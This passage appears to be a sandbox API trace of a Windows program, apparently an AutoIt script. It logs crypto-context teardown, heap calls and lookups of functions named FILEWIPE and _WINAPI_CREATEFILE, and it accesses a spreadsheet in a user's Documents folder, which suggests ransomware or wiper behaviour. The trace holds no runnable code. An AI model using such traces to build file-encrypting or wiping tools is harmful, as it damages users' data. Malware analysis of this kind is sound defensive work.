hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.688] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.688] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0175.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.688] CryptDestroyKey (hKey=0x90af98) returned 1 [0175.688] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.688] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.689] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.689] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.689] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0175.689] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0175.727] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.727] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0175.727] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.728] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.728] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.728] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.728] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.728] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.728] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.728] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.728] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.728] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.728] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0175.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.728] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0175.728] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.728] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0175.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.728] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0175.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.729] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.729] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0175.729] FreeLibrary (hLibModule=0x74f20000) returned 1 [0175.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.731] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.733] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.735] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.735] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0175.736] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.736] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.737] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76ffb7c0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x4bae3550, ftLastAccessTime.dwHighDateTime=0x1d5e28a, ftLastWriteTime.dwLowDateTime=0x4bae3550, ftLastWriteTime.dwHighDateTime=0x1d5e28a, nFileSizeHigh=0x0, nFileSizeLow=0xc3fc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Odo7BQUeZcP1NL2G.ods", cAlternateFileName="ODO7BQ~1.ODS")) returned 0x90af58 [0175.737] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0175.737] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0175.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0175.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0175.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0175.738] CharLowerBuffW (in: lpsz="byte[50172]", cchLength=0xb | out: lpsz="byte[50172]") returned 0xb [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.740] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0175.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.740] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0175.740] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0175.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0175.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0175.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0175.740] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0175.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0175.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.740] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c28e8 [0175.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c28e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0175.741] FreeLibrary (hLibModule=0x75c90000) returned 1 [0175.741] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0175.741] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.742] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0175.742] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0175.742] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.742] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.742] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.743] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.743] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.743] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.743] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.743] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.743] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.743] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.744] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.744] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.745] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0175.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.746] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.746] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.747] 